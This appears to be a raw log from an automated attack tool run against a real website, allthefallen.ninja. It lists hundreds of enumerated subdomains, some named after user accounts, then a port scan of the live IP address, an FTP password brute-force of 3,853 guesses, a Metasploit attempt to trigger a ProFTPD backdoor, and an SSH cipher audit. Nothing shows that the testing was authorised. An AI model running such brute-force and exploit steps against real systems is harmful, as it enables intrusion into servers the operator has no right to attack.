  1853. monabs.blogs.allthefallen.ninja
  1854. moriso.blogs.allthefallen.ninja
  1855. mrexclusive.blogs.allthefallen.ninja
  1856. mrt71.blogs.allthefallen.ninja
  1857. mzq0606.blogs.allthefallen.ninja
  1858. n3fdraws.blogs.allthefallen.ninja
  1859. nasa30.blogs.allthefallen.ninja
  1860. natasha1.blogs.allthefallen.ninja
  1861. nate00.blogs.allthefallen.ninja
  1862. nikolai.blogs.allthefallen.ninja
  1863. noone2001.blogs.allthefallen.ninja
  1864. nznmin.blogs.allthefallen.ninja
  1865. obscenity.blogs.allthefallen.ninja
  1866. ookami.blogs.allthefallen.ninja
  1867. orgazmonitesfm.blogs.allthefallen.ninja
  1868. originalsin.blogs.allthefallen.ninja
  1869. parigi1.blogs.allthefallen.ninja
  1870. passadouro.blogs.allthefallen.ninja
  1871. pawad555.blogs.allthefallen.ninja
  1872. pervdaddy100.blogs.allthefallen.ninja
  1873. pnorberg.blogs.allthefallen.ninja
  1874. poke.blogs.allthefallen.ninja
  1875. pride.blogs.allthefallen.ninja
  1876. qaz2.blogs.allthefallen.ninja
  1877. quelthias.blogs.allthefallen.ninja
  1878. qwertzui12.blogs.allthefallen.ninja
  1879. rafa.blogs.allthefallen.ninja
  1880. rakgi.blogs.allthefallen.ninja
  1881. rdxzzz.blogs.allthefallen.ninja
  1882. redbull.blogs.allthefallen.ninja
  1883. rehashed420.blogs.allthefallen.ninja
  1884. reinet12345.blogs.allthefallen.ninja
  1885. renoturbo999.blogs.allthefallen.ninja
  1886. rezerolabs.blogs.allthefallen.ninja
  1887. rezroth.blogs.allthefallen.ninja
  1888. riggs.blogs.allthefallen.ninja
  1889. rupi.blogs.allthefallen.ninja
  1890. ruwruw3.blogs.allthefallen.ninja
  1891. samme020.blogs.allthefallen.ninja
  1892. sawdawg.blogs.allthefallen.ninja
  1893. scorpionxxx3.blogs.allthefallen.ninja
  1894. semmelblond2016.blogs.allthefallen.ninja
  1895. seranity.blogs.allthefallen.ninja
  1896. sexualanarkhy.blogs.allthefallen.ninja
  1897. shinystarlight.blogs.allthefallen.ninja
  1898. sholi1.blogs.allthefallen.ninja
  1899. shotaboyz.blogs.allthefallen.ninja
  1900. shotakitsune.blogs.allthefallen.ninja
  1901. simplyghastly.blogs.allthefallen.ninja
  1902. sims4mod.blogs.allthefallen.ninja
  1903. sjs1.blogs.allthefallen.ninja
  1904. smogprof.blogs.allthefallen.ninja
  1905. snehet57.blogs.allthefallen.ninja
  1906. sofya.blogs.allthefallen.ninja
  1907. sorocon.blogs.allthefallen.ninja
  1908. soultaker.blogs.allthefallen.ninja
  1909. spankybond.blogs.allthefallen.ninja
  1910. spekkssfm.blogs.allthefallen.ninja
  1911. spirithell.blogs.allthefallen.ninja
  1912. ssss111.blogs.allthefallen.ninja
  1913. stopdat.blogs.allthefallen.ninja
  1914. striderskunk.blogs.allthefallen.ninja
  1915. sunsystem.blogs.allthefallen.ninja
  1916. tamakeri.blogs.allthefallen.ninja
  1917. tazz1989.blogs.allthefallen.ninja
  1918. tbomb64.blogs.allthefallen.ninja
  1919. teens4ever.blogs.allthefallen.ninja
  1920. tessemi.blogs.allthefallen.ninja
  1921. test.blogs.allthefallen.ninja
  1922. test3.blogs.allthefallen.ninja
  1923. testing.blogs.allthefallen.ninja
  1924. tgf5377.blogs.allthefallen.ninja
  1925. thefacke.blogs.allthefallen.ninja
  1926. thelastviking.blogs.allthefallen.ninja
  1927. thesageoflight.blogs.allthefallen.ninja
  1928. tiffany.blogs.allthefallen.ninja
  1929. tiger4me.blogs.allthefallen.ninja
  1930. timmy.blogs.allthefallen.ninja
  1931. tobiwong.blogs.allthefallen.ninja
  1932. tobyquin.blogs.allthefallen.ninja
  1933. tophy420.blogs.allthefallen.ninja
  1934. torpedo.blogs.allthefallen.ninja
  1935. trex.blogs.allthefallen.ninja
  1936. trutlebob.blogs.allthefallen.ninja
  1937. tryin66.blogs.allthefallen.ninja
  1938. u2764.blogs.allthefallen.ninja
  1939. ulithiumdragon.blogs.allthefallen.ninja
  1940. ulrich42.blogs.allthefallen.ninja
  1941. underdog.blogs.allthefallen.ninja
  1942. unidentifiedsfm.blogs.allthefallen.ninja
  1943. vaultgirlspremium.blogs.allthefallen.ninja
  1944. videomaniac.blogs.allthefallen.ninja
  1945. vijaycool55.blogs.allthefallen.ninja
  1946. vilelibrary.blogs.allthefallen.ninja
  1947. vistarrr.blogs.allthefallen.ninja
  1948. vitorio15.blogs.allthefallen.ninja
  1949. wildfire0.blogs.allthefallen.ninja
  1950. willrhem.blogs.allthefallen.ninja
  1951. woahanimator.blogs.allthefallen.ninja
  1952. xxxxbranxxxx.blogs.allthefallen.ninja
  1953. yart.blogs.allthefallen.ninja
  1954. yoshino.blogs.allthefallen.ninja
  1955. z0z12345.blogs.allthefallen.ninja
  1956. zioalmnp65.blogs.allthefallen.ninja
  1957. zlata.blogs.allthefallen.ninja
  1958. zwb0204.blogs.allthefallen.ninja
  1959. creations.allthefallen.ninja
  1960. unidentifiedsfm.creations.allthefallen.ninja
  1961. git.allthefallen.ninja
  1962. gnusocial.allthefallen.ninja
  1963. irc.allthefallen.ninja
  1964. mail.allthefallen.ninja
  1965. mods.allthefallen.ninja
  1966. www.mods.allthefallen.ninja
  1967. ns1.allthefallen.ninja
  1968. panel.allthefallen.ninja
  1969. reader.allthefallen.ninja
  1970. www.reader.allthefallen.ninja
  1971. social.allthefallen.ninja
  1972. www.social.allthefallen.ninja
  1973. stats.allthefallen.ninja
  1974. stories.allthefallen.ninja
  1975. www.stories.allthefallen.ninja
  1976. mail.stories.allthefallen.ninja
  1977. stream.allthefallen.ninja
  1978. www.stream.allthefallen.ninja
  1979. streamserv.allthefallen.ninja
  1980. translations.allthefallen.ninja
  1981. www.translations.allthefallen.ninja
  1982.  
  1983.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
  1984.  ║  â• â•Šâ• ║ ╚═╗╠═╣
  1985.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  1986.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  1987. 
  1988. 1532x.blogs.allthefallen.ninja
  1989. 4ere4nik.blogs.allthefallen.ninja
  1990. 8666395aaa.blogs.allthefallen.ninja
  1991. ab12.blogs.allthefallen.ninja
  1992. acimdoank.blogs.allthefallen.ninja
  1993. adamthevictini.blogs.allthefallen.ninja
  1994. aidenlost.blogs.allthefallen.ninja
  1995. aka2.blogs.allthefallen.ninja
  1996. albertgeert.blogs.allthefallen.ninja
  1997. alberto85.blogs.allthefallen.ninja
  1998. alexandersan.blogs.allthefallen.ninja
  1999. alexf4.blogs.allthefallen.ninja
  2000. *.allthefallen.ninja
  2001. amandare.blogs.allthefallen.ninja
  2002. amazigh.blogs.allthefallen.ninja
  2003. amd752331461.blogs.allthefallen.ninja
  2004. anarkhy.blogs.allthefallen.ninja
  2005. anatolian22.blogs.allthefallen.ninja
  2006. angeltits.blogs.allthefallen.ninja
  2007. angelwings.blogs.allthefallen.ninja
  2008. anjovirtua.blogs.allthefallen.ninja
  2009. antoni123.blogs.allthefallen.ninja
  2010. anynimous2489.blogs.allthefallen.ninja
  2011. aofc.blogs.allthefallen.ninja
  2012. atfacademy.blogs.allthefallen.ninja
  2013. axeman.blogs.allthefallen.ninja
  2014. ayladamlatoprakci.blogs.allthefallen.ninja
  2015. badend.blogs.allthefallen.ninja
  2016. badonion.blogs.allthefallen.ninja
  2017. bamikase.blogs.allthefallen.ninja
  2018. baratays123456789.blogs.allthefallen.ninja
  2019. battleship1026.blogs.allthefallen.ninja
  2020. bbm96.blogs.allthefallen.ninja
  2021. bdkmv4.blogs.allthefallen.ninja
  2022. bdkmv5.blogs.allthefallen.ninja
  2023. benkhatem1415.blogs.allthefallen.ninja
  2024. bibbib4475.blogs.allthefallen.ninja
  2025. bigall.blogs.allthefallen.ninja
  2026. biggirl.blogs.allthefallen.ninja
  2027. billrock.blogs.allthefallen.ninja
  2028. biserbyrov.blogs.allthefallen.ninja
  2029. blogs.allthefallen.ninja
  2030. blublush.blogs.allthefallen.ninja
  2031. bonghgo.blogs.allthefallen.ninja
  2032. britta.blogs.allthefallen.ninja
  2033. bzerka.blogs.allthefallen.ninja
  2034. c010616.blogs.allthefallen.ninja
  2035. caher.blogs.allthefallen.ninja
  2036. canada1.blogs.allthefallen.ninja
  2037. candygirl.blogs.allthefallen.ninja
  2038. caretaker.blogs.allthefallen.ninja
  2039. carthege4.blogs.allthefallen.ninja
  2040. chibitororon.blogs.allthefallen.ninja
  2041. chrmog34.blogs.allthefallen.ninja
  2042. claudemichaelis.blogs.allthefallen.ninja
  2043. clemlove.blogs.allthefallen.ninja
  2044. coman.blogs.allthefallen.ninja
  2045. creat10n.blogs.allthefallen.ninja
  2046. creations.allthefallen.ninja
  2047. cruelcherry.blogs.allthefallen.ninja
  2048. cyncyn.blogs.allthefallen.ninja
  2049. danielsilva.blogs.allthefallen.ninja
  2050. danrem.blogs.allthefallen.ninja
  2051. dariusex007.blogs.allthefallen.ninja
  2052. darknessloving.blogs.allthefallen.ninja
  2053. darkwooddragon.blogs.allthefallen.ninja
  2054. davidaredevil.blogs.allthefallen.ninja
  2055. decalxps.blogs.allthefallen.ninja
  2056. delicious.blogs.allthefallen.ninja
  2057. denofdeviance.blogs.allthefallen.ninja
  2058. diesaudie.blogs.allthefallen.ninja
  2059. diewellet.blogs.allthefallen.ninja
  2060. dirky11.blogs.allthefallen.ninja
  2061. doctorpotpot.blogs.allthefallen.ninja
  2062. dodocat.blogs.allthefallen.ninja
  2063. dodocatsbrats.blogs.allthefallen.ninja
  2064. don12.blogs.allthefallen.ninja
  2065. dopdip.blogs.allthefallen.ninja
  2066. dragonballshota.blogs.allthefallen.ninja
  2067. dragonbomb.blogs.allthefallen.ninja
  2068. dreamgirl.blogs.allthefallen.ninja
  2069. drhong.blogs.allthefallen.ninja
  2070. e1010.blogs.allthefallen.ninja
  2071. ecchixhentai.blogs.allthefallen.ninja
  2072. elendart.blogs.allthefallen.ninja
  2073. elerneron.blogs.allthefallen.ninja
  2074. elrincondelclick.blogs.allthefallen.ninja
  2075. elvis57.blogs.allthefallen.ninja
  2076. equestriangirls.blogs.allthefallen.ninja
  2077. evilfantasy.blogs.allthefallen.ninja
  2078. evilpig.blogs.allthefallen.ninja
  2079. eye3luart.blogs.allthefallen.ninja
  2080. fallentuhell.blogs.allthefallen.ninja
  2081. fatherbill.blogs.allthefallen.ninja
  2082. feelgood01.blogs.allthefallen.ninja
  2083. felipemoura9.blogs.allthefallen.ninja
  2084. felixzane.blogs.allthefallen.ninja
  2085. fertile111.blogs.allthefallen.ninja
  2086. flash.blogs.allthefallen.ninja
  2087. flatsims.blogs.allthefallen.ninja
  2088. franke1.blogs.allthefallen.ninja
  2089. fuckheadmanip.blogs.allthefallen.ninja
  2090. funnybizness.blogs.allthefallen.ninja
  2091. galdelic.blogs.allthefallen.ninja
  2092. gandy2.blogs.allthefallen.ninja
  2093. gangaste.blogs.allthefallen.ninja
  2094. garured.blogs.allthefallen.ninja
  2095. gauulas.blogs.allthefallen.ninja
  2096. gera1.blogs.allthefallen.ninja
  2097. ghostghostartem.blogs.allthefallen.ninja
  2098. giffarie02.blogs.allthefallen.ninja
  2099. girllover666.blogs.allthefallen.ninja
  2100. git.allthefallen.ninja
  2101. gnusocial.allthefallen.ninja
  2102. gonemo.blogs.allthefallen.ninja
  2103. greyward.blogs.allthefallen.ninja
  2104. hatfiy.blogs.allthefallen.ninja
  2105. hayrom22.blogs.allthefallen.ninja
  2106. heathb2011.blogs.allthefallen.ninja
  2107. henloli.blogs.allthefallen.ninja
  2108. holgarf1.blogs.allthefallen.ninja
  2109. honeyselect.blogs.allthefallen.ninja
  2110. honeyselectcreators.blogs.allthefallen.ninja
  2111. honkytonk.blogs.allthefallen.ninja
  2112. hornedpariah.blogs.allthefallen.ninja
  2113. hugefacial.blogs.allthefallen.ninja
  2114. hulk666.blogs.allthefallen.ninja
  2115. ibrene10.blogs.allthefallen.ninja
  2116. imposible.blogs.allthefallen.ninja
  2117. incubator.blogs.allthefallen.ninja
  2118. irc.allthefallen.ninja
  2119. jackyhf.blogs.allthefallen.ninja
  2120. jacob.blogs.allthefallen.ninja
  2121. jamesrolha.blogs.allthefallen.ninja
  2122. janhgr.blogs.allthefallen.ninja
  2123. jecb8421.blogs.allthefallen.ninja
  2124. jetroveron88.blogs.allthefallen.ninja
  2125. jimmytricky63.blogs.allthefallen.ninja
  2126. jizzo.blogs.allthefallen.ninja
  2127. jkrrick.blogs.allthefallen.ninja
  2128. joachim51.blogs.allthefallen.ninja
  2129. johnjakeson.blogs.allthefallen.ninja
  2130. johnohsonik.blogs.allthefallen.ninja
  2131. jonann01.blogs.allthefallen.ninja
  2132. js8220225.blogs.allthefallen.ninja
  2133. juicylucy.blogs.allthefallen.ninja
  2134. junior1.blogs.allthefallen.ninja
  2135. junsang.blogs.allthefallen.ninja
  2136. justaperson.blogs.allthefallen.ninja
  2137. justinyo123.blogs.allthefallen.ninja
  2138. kalonn.blogs.allthefallen.ninja
  2139. kati.blogs.allthefallen.ninja
  2140. kazadorxxx.blogs.allthefallen.ninja
  2141. keith1967.blogs.allthefallen.ninja
  2142. kimbo.blogs.allthefallen.ninja
  2143. kiralushia.blogs.allthefallen.ninja
  2144. kleettus.blogs.allthefallen.ninja
  2145. kmoumou.blogs.allthefallen.ninja
  2146. kosho1.blogs.allthefallen.ninja
  2147. krakozybra2.blogs.allthefallen.ninja
  2148. krigenz.blogs.allthefallen.ninja
  2149. krommbomm.blogs.allthefallen.ninja
  2150. lew9876.blogs.allthefallen.ninja
  2151. lincoln1510.blogs.allthefallen.ninja
  2152. litanei.blogs.allthefallen.ninja
  2153. littljack.blogs.allthefallen.ninja
  2154. load.blogs.allthefallen.ninja
  2155. locomandril.blogs.allthefallen.ninja
  2156. lolipop.blogs.allthefallen.ninja
  2157. london.blogs.allthefallen.ninja
  2158. longo.blogs.allthefallen.ninja
  2159. lordariakus.blogs.allthefallen.ninja
  2160. loser3.blogs.allthefallen.ninja
  2161. loxiza.blogs.allthefallen.ninja
  2162. lunarflare.blogs.allthefallen.ninja
  2163. luxiturna.blogs.allthefallen.ninja
  2164. lyfblom8670.blogs.allthefallen.ninja
  2165. mabit.blogs.allthefallen.ninja
  2166. macross2401.blogs.allthefallen.ninja
  2167. mangaforms.blogs.allthefallen.ninja
  2168. manni.blogs.allthefallen.ninja
  2169. marasi666.blogs.allthefallen.ninja
  2170. marrij.blogs.allthefallen.ninja
  2171. master4617.blogs.allthefallen.ninja
  2172. matutepablo24.blogs.allthefallen.ninja
  2173. maxelljedo418.blogs.allthefallen.ninja
  2174. maximilian.blogs.allthefallen.ninja
  2175. maxmouse.blogs.allthefallen.ninja
  2176. mcfluffy.blogs.allthefallen.ninja
  2177. meivontodd.blogs.allthefallen.ninja
  2178. methandcatcrap.blogs.allthefallen.ninja
  2179. mezeno.blogs.allthefallen.ninja
  2180. mico946.blogs.allthefallen.ninja
  2181. mikes.blogs.allthefallen.ninja
  2182. minecraft316.blogs.allthefallen.ninja
  2183. mods.allthefallen.ninja
  2184. monabs.blogs.allthefallen.ninja
  2185. moriso.blogs.allthefallen.ninja
  2186. mrexclusive.blogs.allthefallen.ninja
  2187. mrt71.blogs.allthefallen.ninja
  2188. mzq0606.blogs.allthefallen.ninja
  2189. n3fdraws.blogs.allthefallen.ninja
  2190. nasa30.blogs.allthefallen.ninja
  2191. natasha1.blogs.allthefallen.ninja
  2192. nate00.blogs.allthefallen.ninja
  2193. nikolai.blogs.allthefallen.ninja
  2194. noone2001.blogs.allthefallen.ninja
  2195. nznmin.blogs.allthefallen.ninja
  2196. obscenity.blogs.allthefallen.ninja
  2197. ookami.blogs.allthefallen.ninja
  2198. orgazmonitesfm.blogs.allthefallen.ninja
  2199. originalsin.blogs.allthefallen.ninja
  2200. parigi1.blogs.allthefallen.ninja
  2201. passadouro.blogs.allthefallen.ninja
  2202. pawad555.blogs.allthefallen.ninja
  2203. pervdaddy100.blogs.allthefallen.ninja
  2204. pnorberg.blogs.allthefallen.ninja
  2205. poke.blogs.allthefallen.ninja
  2206. pride.blogs.allthefallen.ninja
  2207. qaz2.blogs.allthefallen.ninja
  2208. quelthias.blogs.allthefallen.ninja
  2209. qwertzui12.blogs.allthefallen.ninja
  2210. rafa.blogs.allthefallen.ninja
  2211. rakgi.blogs.allthefallen.ninja
  2212. rdxzzz.blogs.allthefallen.ninja
  2213. reader.allthefallen.ninja
  2214. redbull.blogs.allthefallen.ninja
  2215. rehashed420.blogs.allthefallen.ninja
  2216. reinet12345.blogs.allthefallen.ninja
  2217. renoturbo999.blogs.allthefallen.ninja
  2218. rezerolabs.blogs.allthefallen.ninja
  2219. rezroth.blogs.allthefallen.ninja
  2220. riggs.blogs.allthefallen.ninja
  2221. rupi.blogs.allthefallen.ninja
  2222. ruwruw3.blogs.allthefallen.ninja
  2223. samme020.blogs.allthefallen.ninja
  2224. sawdawg.blogs.allthefallen.ninja
  2225. scorpionxxx3.blogs.allthefallen.ninja
  2226. semmelblond2016.blogs.allthefallen.ninja
  2227. seranity.blogs.allthefallen.ninja
  2228. sexualanarkhy.blogs.allthefallen.ninja
  2229. shinystarlight.blogs.allthefallen.ninja
  2230. sholi1.blogs.allthefallen.ninja
  2231. shotaboyz.blogs.allthefallen.ninja
  2232. shotakitsune.blogs.allthefallen.ninja
  2233. simplyghastly.blogs.allthefallen.ninja
  2234. sims4mod.blogs.allthefallen.ninja
  2235. sjs1.blogs.allthefallen.ninja
  2236. smogprof.blogs.allthefallen.ninja
  2237. snehet57.blogs.allthefallen.ninja
  2238. social.allthefallen.ninja
  2239. sofya.blogs.allthefallen.ninja
  2240. sorocon.blogs.allthefallen.ninja
  2241. soultaker.blogs.allthefallen.ninja
  2242. spankybond.blogs.allthefallen.ninja
  2243. spekkssfm.blogs.allthefallen.ninja
  2244. spirithell.blogs.allthefallen.ninja
  2245. ssss111.blogs.allthefallen.ninja
  2246. stats.allthefallen.ninja
  2247. stopdat.blogs.allthefallen.ninja
  2248. stories.allthefallen.ninja
  2249. stream.allthefallen.ninja
  2250. streamserv.allthefallen.ninja
  2251. striderskunk.blogs.allthefallen.ninja
  2252. sunsystem.blogs.allthefallen.ninja
  2253. tamakeri.blogs.allthefallen.ninja
  2254. tazz1989.blogs.allthefallen.ninja
  2255. tbomb64.blogs.allthefallen.ninja
  2256. teens4ever.blogs.allthefallen.ninja
  2257. tessemi.blogs.allthefallen.ninja
  2258. test3.blogs.allthefallen.ninja
  2259. test.blogs.allthefallen.ninja
  2260. testing.blogs.allthefallen.ninja
  2261. tgf5377.blogs.allthefallen.ninja
  2262. thefacke.blogs.allthefallen.ninja
  2263. thelastviking.blogs.allthefallen.ninja
  2264. thesageoflight.blogs.allthefallen.ninja
  2265. tiffany.blogs.allthefallen.ninja
  2266. tiger4me.blogs.allthefallen.ninja
  2267. timmy.blogs.allthefallen.ninja
  2268. tobiwong.blogs.allthefallen.ninja
  2269. tobyquin.blogs.allthefallen.ninja
  2270. tophy420.blogs.allthefallen.ninja
  2271. torpedo.blogs.allthefallen.ninja
  2272. translations.allthefallen.ninja
  2273. trex.blogs.allthefallen.ninja
  2274. trutlebob.blogs.allthefallen.ninja
  2275. tryin66.blogs.allthefallen.ninja
  2276. u2764.blogs.allthefallen.ninja
  2277. ulithiumdragon.blogs.allthefallen.ninja
  2278. ulrich42.blogs.allthefallen.ninja
  2279. underdog.blogs.allthefallen.ninja
  2280. unidentifiedsfm.blogs.allthefallen.ninja
  2281. unidentifiedsfm.creations.allthefallen.ninja
  2282. vaultgirlspremium.blogs.allthefallen.ninja
  2283. videomaniac.blogs.allthefallen.ninja
  2284. vijaycool55.blogs.allthefallen.ninja
  2285. vilelibrary.blogs.allthefallen.ninja
  2286. vistarrr.blogs.allthefallen.ninja
  2287. vitorio15.blogs.allthefallen.ninja
  2288. wildfire0.blogs.allthefallen.ninja
  2289. willrhem.blogs.allthefallen.ninja
  2290. woahanimator.blogs.allthefallen.ninja
  2291. www.allthefallen.ninja
  2292. www.mods.allthefallen.ninja
  2293. www.reader.allthefallen.ninja
  2294. www.social.allthefallen.ninja
  2295. www.stories.allthefallen.ninja
  2296. www.stream.allthefallen.ninja
  2297. www.translations.allthefallen.ninja
  2298. xxxxbranxxxx.blogs.allthefallen.ninja
  2299. yart.blogs.allthefallen.ninja
  2300. yoshino.blogs.allthefallen.ninja
  2301. z0z12345.blogs.allthefallen.ninja
  2302. zioalmnp65.blogs.allthefallen.ninja
  2303. zlata.blogs.allthefallen.ninja
  2304. zwb0204.blogs.allthefallen.ninja
  2305.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-allthefallen.ninja-full.txt
  2306. 
  2307.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  2308.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  2309.  
  2310.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  2311. PING allthefallen.ninja (178.132.1.137) 56(84) bytes of data.
  2312. 64 bytes from server.allthefallen.ninja (178.132.1.137): icmp_seq=1 ttl=53 time=116 ms
  2313.  
  2314. --- allthefallen.ninja ping statistics ---
  2315. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  2316. rtt min/avg/max/mdev = 116.970/116.970/116.970/0.000 ms
  2317.  
  2318.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  2319.  
  2320. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 13:29 EST
  2321. Nmap scan report for allthefallen.ninja (178.132.1.137)
  2322. Host is up (0.16s latency).
  2323. rDNS record for 178.132.1.137: server.allthefallen.ninja
  2324. Not shown: 452 closed ports, 9 filtered ports
  2325. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2326. PORT     STATE SERVICE
  2327. 21/tcp   open  ftp
  2328. 22/tcp   open  ssh
  2329. 53/tcp   open  domain
  2330. 80/tcp   open  http
  2331. 110/tcp  open  pop3
  2332. 143/tcp  open  imap
  2333. 443/tcp  open  https
  2334. 993/tcp  open  imaps
  2335. 995/tcp  open  pop3s
  2336. 8443/tcp open  https-alt
  2337. 8880/tcp open  cddbp-alt
  2338. 9000/tcp open  cslistener
  2339.  
  2340. Nmap done: 1 IP address (1 host up) scanned in 12.47 seconds
  2341.  
  2342.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  2343.  + -- --=[Port 21 opened... running tests...
  2344.  
  2345. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 13:29 EST
  2346. Nmap scan report for allthefallen.ninja (178.132.1.137)
  2347. Host is up (0.12s latency).
  2348. rDNS record for 178.132.1.137: server.allthefallen.ninja
  2349.  
  2350. PORT   STATE SERVICE VERSION
  2351. 21/tcp open  ftp     ProFTPD
  2352. | ftp-brute:
  2353. |   Accounts: No valid accounts found
  2354. |_  Statistics: Performed 3853 guesses in 180 seconds, average tps: 21.3
  2355. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2356. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.13 (92%), Linux 2.6.39 (92%), Linux 3.16 (91%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.8 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%)
  2357. No exact OS matches for host (test conditions non-ideal).
  2358. Network Distance: 11 hops
  2359.  
  2360. TRACEROUTE (using port 21/tcp)
  2361. HOP RTT       ADDRESS
  2362. 1   108.39 ms 10.13.0.1
  2363. 2   109.99 ms 37.187.24.253
  2364. 3   109.47 ms 10.50.225.61
  2365. 4   109.70 ms 10.17.129.46
  2366. 5   109.23 ms 10.73.0.54
  2367. 6   ...
  2368. 7   116.23 ms be100-1108.ams-1-a9.nl.eu (213.186.32.211)
  2369. 8   116.25 ms be100-2.ams-1-a9.nl.eu (94.23.122.230)
  2370. 9   ...
  2371. 10  117.51 ms 109.236.95.111
  2372. 11  116.75 ms server.allthefallen.ninja (178.132.1.137)
  2373.  
  2374. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2375. Nmap done: 1 IP address (1 host up) scanned in 218.59 seconds
  2376. # cowsay++
  2377.  ____________
  2378. < metasploit >
  2379.  ------------
  2380.        \   ,__,
  2381.         \  (oo)____
  2382.            (__)    )\
  2383.               ||--|| *
  2384. 
  2385.  
  2386.        =[ metasploit v4.16.24-dev                         ]
  2387. + -- --=[ 1714 exploits - 973 auxiliary - 300 post        ]
  2388. + -- --=[ 503 payloads - 40 encoders - 10 nops            ]
  2389. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2390.  
  2391. RHOST => allthefallen.ninja
  2392. RHOSTS => allthefallen.ninja
  2393. [*] allthefallen.ninja:21 - Banner: 220 [server.allthefallen.ninja] i-MSCP FTP server.
  2394. [*] allthefallen.ninja:21 - USER: 331 Password required for KbU:)
  2395. [*] Exploit completed, but no session was created.
  2396. [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
  2397. [*] Started reverse TCP double handler on 127.0.0.1:4444
  2398. [*] allthefallen.ninja:21 - Sending Backdoor Command
  2399. [-] allthefallen.ninja:21 - Not backdoored
  2400. [*] Exploit completed, but no session was created.
  2401.  + -- --=[Port 22 opened... running tests...
  2402. # general
  2403. (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1
  2404. (gen) software: OpenSSH 7.4p1
  2405. (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
  2406. (gen) compression: enabled (zlib@openssh.com)
  2407.  
  2408. # key exchange algorithms
  2409. (kex) curve25519-sha256                     -- [warn] unknown algorithm
  2410. (kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
  2411. (kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
  2412.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2413. (kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
  2414.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2415. (kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
  2416.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2417. (kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
  2418.                                             `- [info] available since OpenSSH 4.4
  2419. (kex) diffie-hellman-group16-sha512         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  2420. (kex) diffie-hellman-group18-sha512         -- [info] available since OpenSSH 7.3
  2421. (kex) diffie-hellman-group14-sha256         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  2422. (kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
  2423.                                             `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  2424.  
  2425. # host-key algorithms
  2426. (key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  2427. (key) rsa-sha2-512                          -- [info] available since OpenSSH 7.2
  2428. (key) rsa-sha2-256                          -- [info] available since OpenSSH 7.2
  2429. (key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
  2430.                                             `- [warn] using weak random number generator could reveal the key
  2431.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  2432. (key) ssh-ed25519                           -- [info] available since OpenSSH 6.5
  2433.  
  2434. # encryption algorithms (ciphers)
  2435. (enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
  2436.                                             `- [info] default cipher since OpenSSH 6.9.
  2437. (enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2438. (enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
  2439. (enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  2440. (enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2
  2441. (enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2
  2442.  
  2443. # message authentication code algorithms
  2444. (mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size
  2445.                                             `- [info] available since OpenSSH 6.2
  2446. (mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2
  2447. (mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2
  2448. (mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2
  2449. (mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm
  2450.                                             `- [info] available since OpenSSH 6.2
  2451. (mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
  2452.                                             `- [warn] using small 64-bit tag size
  2453.                                             `- [info] available since OpenSSH 4.7
  2454. (mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode
  2455.                                             `- [info] available since OpenSSH 6.2
  2456. (mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
  2457.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2458. (mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
  2459.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2460. (mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
  2461.                                             `- [warn] using weak hashing algorithm
  2462.                                             `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2463.  
  2464. # algorithm recommendations (for OpenSSH 7.4)
  2465. (rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
  2466. (rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
